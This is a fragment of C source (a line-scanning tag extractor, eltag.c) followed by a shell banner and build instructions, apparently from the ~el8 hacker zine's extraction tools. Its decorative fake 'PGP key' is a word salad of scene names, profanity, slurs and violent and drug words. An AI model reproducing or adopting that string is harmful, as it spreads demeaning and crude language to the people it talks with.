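    out = stderr;
  t4gz (file, t4g, type);
  exit (0);
}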
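/*
 * Scan file T and report every line that matches the sscanf() pattern
 * `tag`, together with the number of the read it was found on.
 *
 * T:   path of the file to scan.
 * tag: sscanf() format with two conversions, an integer article number and
 *      a name.  It is used as a format string, so it must only ever come
 *      from the program's own constants, never from input.
 * io:  'i', 'X', 'O' or 'x' to choose how the article number is printed;
 *      any other value prints it like 'i' with a "Line #" label.
 *
 * Matches are written to the global `out` (stderr when it is NULL).  The
 * function does not return: it ends the program with exit(0), or exit(-1)
 * when T is missing or cannot be opened.
 *
 * lineno counts fgets() reads of at most 79 characters, so a longer
 * physical line is counted more than once.
 */
void
t4gz (char *T,char *tag,int io)
{
  char articlename[80];
  int articleno = 0;            /* int, to match the %i in the tag format */
  int lineno = 0;
  FILE *TFD;
  FILE *dest = (out != NULL) ? out : stderr;
  char buf[80];

  if (T == NULL)
    {
      fprintf (stderr, "no input file given\n");
      exit (-1);
    }
  if ((TFD = fopen (T, "r")) == NULL)
    {
      perror (T);
      exit (-1);
    }
  /* articlename cannot overflow: buf holds at most 79 characters and the
     name is only a part of it */
  while (fgets (buf, sizeof (buf), TFD) != NULL)
    {
      lineno++;
      if (sscanf (buf, tag, &articleno, articlename) != 2)
        continue;
      /* results go to `dest`; they used to be sent to stderr even when an
         output file had been opened with -o */
      switch (io)
        {
        case 'i':
          fprintf (dest, "[(%04i) %20s]\t @ \033[1mLine %i\033[m\n",
                   articleno, articlename, lineno);
          break;
        case 'X':
          fprintf (dest, "[(%4X) %20s]\t @ \033[1mLine %i\033[m\n",
                   (unsigned) articleno, articlename, lineno);
          break;
        case 'O':
          fprintf (dest, "[(%4o) %20s]\t @ \033[1mLine %i\033[m\n",
                   (unsigned) articleno, articlename, lineno);
          break;
        case 'x':
          fprintf (dest, "[(%4x) %20s]\t @ \033[1mLine %i\033[m\n",
                   (unsigned) articleno, articlename, lineno);
          break;
        default:
          fprintf (dest, "[(%04i) %20s]\t @ \033[1mLine #%i\033[m\n",
                   articleno, articlename, lineno);
          break;
        }
    }
  fclose (TFD);
  /* only close a stream that -o opened; stderr is left alone */
  if (dest != stderr)
    fclose (dest);
  exit (0);
}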
[END_CUT] eltag.c
[EOW]
[EOI]
# Banner shown once the extraction step has run. The "PGP PUBLIC KEY BLOCK"
# inside it is decorative filler: its body contains characters outside the
# base64 alphabet, so it is not an armored key and cannot be imported.
# printf with a fixed '%s\n' format prints the text without interpreting
# the backslashes in the artwork.
printf '%s\n' '
lllllll 888888888
l:::::l 88:::::::::88
l:::::l 88:::::::::::::88
l:::::l 8::::::88888::::::8
eeeeeeeeeeee l::::l 8:::::8 8:::::8
ee::::::::::::ee l::::l 8:::::8 8:::::8
_________ _____ e::::::eeeee:::::ee l::::l 8:::::88888:::::8
/ \ / |e::::::e e:::::el::::l 8:::::::::::::8
/ ~el8 \/ /e:::::::eeeee::::::el::::l 8:::::88888:::::8
/ _ / e:::::::::::::::::e l::::l 8:::::8 8:::::8
/ / \ / e::::::eeeeeeeeeee l::::l 8:::::8 8:::::8
\_____/ \________/ e:::::::e l::::l 8:::::8 8:::::8
e::::::::e l::::::l8::::::88888::::::8
e::::::::eeeeeeee l::::::l 88:::::::::::::88
ee:::::::::::::e l::::::l 88:::::::::88
eeeeeeeeeeeeee llllllll 888888888
.g4yd4nb4n.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 31.8-720i
~el80d4yw4r3zhackpussybitchcodefuckcuntsuckHACKlamerlameexploitk
routephrackcotnophreakPLAtheinfancyconceptr00tshipleylkmplaguez!
antiloveADMTESOrootnobodyhackinghackershackerzhackalotF.U.C.K.AA
FEHstrHERTgaiusACZawrJOBEcrackcocainheroinsmokedopeUNIXVMSLINUX!
fluffibunnidatacouriersb4b09xx25x.25ROLMSDMShdlcLAPBPPPPSNSPRINT
internetWAREZLoD/MoDlegionofdoomMastersofdumpstersphonetelcoseno
jduckw00w00cDccultdeadcowcultdeadcatcultdeadjimmorrison2pacrapFi
defacementsrockwwwdefacersdefacethischriscrossthehackerschoice!l
bbsCCC2600BoWSoWWoWCoWPoWprisonersofWarEzDCCfileuploadmp3SEXpusy
violencedeathmurderkillSPAMilovespamSPAFpurduechickenshitpoopLoL
roflmao:D:PchatroomIRCinternetretardchatATTat&tbellmahballz~el8o
roxsuxhackzfuxzerodayz0dayzodayzthesatan!isourgod~el80dayw4r3z4u
-----END PGP PUBLIC KEY BLOCK-----
'
# Post-extraction instructions, followed by one blank line. The single quotes
# are deliberate: $CC and ~el8[0] are shown to the reader literally and are
# not expanded by this script.
# NOTE(review): eldump's code() routine opens its file-name argument with "w+"
# after an optional chdir; the name presumably comes from the CUT_HERE tags in
# the issue text, so build and run eldump in an empty scratch directory and
# confirm how names are parsed before pointing it at any other file.
# shellcheck disable=SC2016
printf '%s\n' \
  'Extracted eldump.c' \
  'use $CC eldump.c -o eldump' \
  './eldump ~el8[0] (-v | -vv | -vvv)' \
  ''